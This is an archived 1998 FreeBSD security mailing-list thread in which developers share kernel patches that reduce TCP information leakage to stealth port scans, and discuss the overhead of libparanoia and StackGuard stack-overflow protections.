Thu, 17 Sep 1998 21:27:14 +1000 From: Darren Reed Subject: Re: Are we vulnerable to "stealth" port scans? To: phk@critter.freebsd.dk (Poul-Henning Kamp) Date: Thu, 17 Sep 1998 21:27:13 +1000 (EST) Cc: jkb@best.com, john@unt.edu, freebsd-security@FreeBSD.ORG In-Reply-To: <8631.906017885@critter.freebsd.dk> from "Poul-Henning Kamp" at Sep 17, 98 09:38:05 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Poul-Henning Kamp, sie said: > > > patches ? hmmm, see if you can track down the code which makes the replies sent back different - i.e. all RST's go back with fields filled in by what was received. THe problem is leakage of internal information DEPENDING (<- which is what makes it possible) on what state (if any) the socket which matches the packet used to scan with. darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 05:47:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA01127 for freebsd-security-outgoing; Thu, 17 Sep 1998 05:47:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.reed.wattle.id.au (darren2.lnk.telstra.net [139.130.53.33]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA01108 for ; Thu, 17 Sep 1998 05:46:55 -0700 (PDT) (envelope-from darrenr@reed.wattle.id.au) Received: (from root@localhost) by firewall.reed.wattle.id.au (8.8.7/8.8.7) id MAA08465; Thu, 17 Sep 1998 12:45:54 GMT Received: from avalon.reed.wattle.id.au(192.168.1.1) by firewall.reed.wattle.id.au via smap (V1.3) id sma008463; Thu Sep 17 12:45:52 1998 Received: from percival.reed.wattle.id.au. (percival.reed.wattle.id.au [192.168.1.5]) by avalon.reed.wattle.id.au (8.9.0.Beta3/8.9.0.Beta3) with SMTP id WAA03566; Thu, 17 Sep 1998 22:45:50 +1000 (EST) From: Darren Reed Message-Id: <199809171245.WAA03566@avalon.reed.wattle.id.au> Subject: Making "stealth" scans harder. To: darrenr@reed.wattle.id.au (Darren Reed) Date: Thu, 17 Sep 1998 22:45:49 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The below patch helps to reduce the leakage of internal socket information when a TCP "stealth" scan is directed at a *BSD box by ensuring the window is 0 for all RST packets generated through tcp_respond(). Patch is against NetBSD-1.3G but should apply to others with some fuzz. Cheers, Darren *** tcp_subr.c.orig Sun Aug 2 21:16:42 1998 --- tcp_subr.c Thu Sep 17 22:38:51 1998 *************** *** 214,220 **** struct route *ro = 0; if (tp) { ! win = sbspace(&tp->t_inpcb->inp_socket->so_rcv); ro = &tp->t_inpcb->inp_route; } if (m == 0) { --- 214,221 ---- struct route *ro = 0; if (tp) { ! if (!(flags & TH_RST)) ! win = sbspace(&tp->t_inpcb->inp_socket->so_rcv); ro = &tp->t_inpcb->inp_route; } if (m == 0) { *************** *** 247,253 **** ti->ti_ack = htonl(ack); ti->ti_x2 = 0; if ((flags & TH_SYN) == 0) { ! if (tp) ti->ti_win = htons((u_int16_t) (win >> tp->rcv_scale)); else ti->ti_win = htons((u_int16_t)win); --- 248,254 ---- ti->ti_ack = htonl(ack); ti->ti_x2 = 0; if ((flags & TH_SYN) == 0) { ! if (tp && !(flags & TH_RST)) ti->ti_win = htons((u_int16_t) (win >> tp->rcv_scale)); else ti->ti_win = 0; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 13:20:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA18283 for freebsd-security-outgoing; Thu, 17 Sep 1998 13:20:47 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA18204 for ; Thu, 17 Sep 1998 13:20:33 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id QAA23714; Thu, 17 Sep 1998 16:19:52 -0400 (EDT) From: "Allen Smith" Message-Id: <9809171619.ZM23712@beatrice.rutgers.edu> Date: Thu, 17 Sep 1998 16:19:52 -0400 In-Reply-To: Alexandre Snarskii "Re: The 99,999-bug question: Why can you execute from the stack?" (Jul 20, 9:42am) References: <199807200102.SAA07953@bubba.whistle.com> <199807200148.TAA07794@harmony.village.org> <9807192209.ZM23527@beatrice.rutgers.edu> <19980720173800.17978@nevalink.ru> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Alexandre Snarskii , Warner Losh Subject: Re: The 99,999-bug question: Why can you execute from the stack? Cc: security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 20, 9:42am, Alexandre Snarskii (possibly) wrote: > > On Sun, Jul 19, 1998 at 10:09:29PM -0400, Allen Smith wrote: > > I'd suggest adding anything executing with an effective uid of root; > > keep in mind servers. I've actually worked on this with the > > libparanoia's libc substitution, at least with the non-assembler ones; > > I'll try to find the time to test soon whether this actually speeds > > things up. > > Better approach is (every suid/sgid program) or ( euid == 0 ). > Patch to libparanoia/stentry.c attached. ( You have no need to > patch any other file - all checks are in stentry.c, others is just > standard files from /usr/src/lib/libc, just calls to stentry.c functions > added ). > Patched libparanoia available at > ftp://ftp.lexa.ru/pub/domestic/snar/libparanoia.1.1.tgz Sorry about the delay on replying to this; I've been busy. While this is a nicer way to do this in many ways, I am concerned in whether the delay from calling the libparanoia checks is from the function call or from what the function does. If the latter, fine; if the former, the problem I was working on (avoiding the slowdown except when really needed) still exists. Any idea which is the case? (Of course, there's also the time taken in doing the issetugid and geteuid checks in either case, whether one has them in the individual functions or in stentry.c.) If need be, I'll try some profiling, but I'd prefer to avoid that if someone already knows the answer. Thanks, -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 17 13:29:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA20551 for freebsd-security-outgoing; Thu, 17 Sep 1998 13:29:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA20485 for ; Thu, 17 Sep 1998 13:29:06 -0700 (PDT) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zJkfM-0003rS-00; Thu, 17 Sep 1998 14:28:36 -0600 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id OAA19373; Thu, 17 Sep 1998 14:29:50 -0600 (MDT) Message-Id: <199809172029.OAA19373@harmony.village.org> To: "Allen Smith" Subject: Re: The 99,999-bug question: Why can you execute from the stack? Cc: Alexandre Snarskii , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 17 Sep 1998 16:19:52 EDT." <9809171619.ZM23712@beatrice.rutgers.edu> References: <9809171619.ZM23712@beatrice.rutgers.edu> <199807200102.SAA07953@bubba.whistle.com> <199807200148.TAA07794@harmony.village.org> <9807192209.ZM23527@beatrice.rutgers.edu> <19980720173800.17978@nevalink.ru> Date: Thu, 17 Sep 1998 14:29:50 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <9809171619.ZM23712@beatrice.rutgers.edu> "Allen Smith" writes: : Sorry about the delay on replying to this; I've been busy. While this : is a nicer way to do this in many ways, I am concerned in whether the : delay from calling the libparanoia checks is from the function call or : from what the function does. If the latter, fine; if the former, the : problem I was working on (avoiding the slowdown except when really : needed) still exists. Any idea which is the case? (Of course, there's : also the time taken in doing the issetugid and geteuid checks in : either case, whether one has them in the individual functions or in : stentry.c.) If need be, I'll try some profiling, but I'd prefer to : avoid that if someone already knows the answer. There is something called StackGuard that is available that does something similar to all functions that libparanoia does for str*. It places "canaries" in the stack frame and uses them to detect overflows. They claim there is little or no measurable slowdown. I'm playing with this in my spare time and will report back when I have something to say. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 18 09:26:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA15904 for freebsd-security-outgoing; Fri, 18 Sep 1998 09:26:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from marta.arcom.spb.su (marta.arcom.spb.su [195.190.100.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA15899 for ; Fri, 18 Sep 1998 09:26:33 -0700 (PDT) (envelope-from snar@marta.arcom.spb.su) Received: (from snar@localhost) by marta.arcom.spb.su (8.8.8/t/97-Mar-14) id UAA15068; Fri, 18 Sep 1998 20:23:09 +0400 (MSD) Message-ID: <19980918202308.39458@nevalink.ru> Date: Fri, 18 Sep 1998 20:23:08 +0400 From: Alexandre Snarskii To: Allen Smith , Alexandre Snarskii , Warner Losh Cc: security@FreeBSD.ORG Subject: Re: The 99,999-bug question: Why can you execute from the stack? References: <199807200102.SAA07953@bubba.whistle.com> <199807200148.TAA07794@harmony.village.org> <9807192209.ZM23527@beatrice.rutgers.edu> <19980720173800.17978@nevalink.ru> <9809171619.ZM23712@beatrice.rutgers.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89i In-Reply-To: <9809171619.ZM23712@beatrice.rutgers.edu>; from Allen Smith on Thu, Sep 17, 1998 at 04:19:52PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 17, 1998 at 04:19:52PM -0400, Allen Smith wrote: > > > I'd suggest adding anything executing with an effective uid of root; > > > keep in mind servers. I've actually worked on this with the > > > libparanoia's libc substitution, at least with the non-assembler ones; > > > I'll try to find the time to test soon whether this actually speeds > > > things up. > > > > Better approach is (every suid/sgid program) or ( euid == 0 ). > > Patch to libparanoia/stentry.c attached. ( You have no need to > > patch any other file - all checks are in stentry.c, others is just > > standard files from /usr/src/lib/libc, just calls to stentry.c functions > > added ). > > Patched libparanoia available at > > ftp://ftp.lexa.ru/pub/domestic/snar/libparanoia.1.1.tgz New versions available at the same place. Library, which checks stack integrity only for cases of setugid/root owned now called libaranoia.N.N-root.tgz, where N.N is a version. Note, that these checks is a little broken by design - there are some daemons (tftpd, for example) running non-setuid and with euid!=0, so, no checks of stack integrity done. > > Sorry about the delay on replying to this; I've been busy. While this > is a nicer way to do this in many ways, I am concerned in whether the > delay from calling the libparanoia checks is from the function call or > from what the function does. If the latter, fine; if the former, the > problem I was working on (avoiding the slowdown except when really > needed) still exists. Any idea which is the case? (Of course, there's ^^^^^^^^^^^^^^^^^^^^^^^^^^ Second one. > also the time taken in doing the issetugid and geteuid checks in > either case, whether one has them in the individual functions or in This check done only once - at first call to any 'insecure' function. Result stored in global static variable, and used in later calls to avoid switching to kernel mode. > stentry.c.) If need be, I'll try some profiling, but I'd prefer to > avoid that if someone already knows the answer. Paranoidal strcpy (on short strings) runs about six times slower that standard. On longer strins (tested with 1K) there is about no difference. ( 1K strings with 'always check' policy by default and 'only root check' policy in preloaded libparanoia : snar@horse:~/compile/p-checks>time ./a.out 9.04 real 6.62 user 0.02 sys snar@horse:~/compile/p-checks>export LD_PRELOAD=../libparanoia/libparanoia.so.1.2 snar@horse:~/compile/p-checks>time ./a.out 8.80 real 6.46 user 0.00 sys 1 byte string with same policy: snar@horse:~/compile/p-checks>time ./a.out 0.46 real 0.42 user 0.00 sys snar@horse:~/compile/p-checks>export LD_PRELOAD=../libparanoia/libparanoia.so.1.2 snar@horse:~/compile/p-checks>time ./a.out 0.16 real 0.13 user 0.01 sys -- Alexandre Snarskii the source code is included To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 18 22:40:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23309 for freebsd-security-outgoing; Fri, 18 Sep 1998 22:40:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23288 for ; Fri, 18 Sep 1998 22:40:56 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199809190540.WAA23288@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA131023619; Sat, 19 Sep 1998 15:40:19 +1000 From: Darren Reed Subject: stopping "nack" `stealth' scanning. To: bugtraq@netspace.org Date: Sat, 19 Sep 1998 15:40:19 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One of the other ways to stealth scan is observing which ports no reply is received for. This patch causes RST's to be generated when sending (for example) a FIN to a listening socket, the same as in all other occasions. Patch provided by mycroft. Darren *** tcp_input.c.orig Sat Sep 19 14:52:06 1998 --- tcp_input.c Sat Sep 19 14:24:22 1998 *************** *** 618,624 **** tiwin <<= tp->snd_scale; goto after_listen; } ! } } else { /* * Received a SYN. --- 618,625 ---- tiwin <<= tp->snd_scale; goto after_listen; } ! } else ! goto badsyn; } else { /* * Received a SYN. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message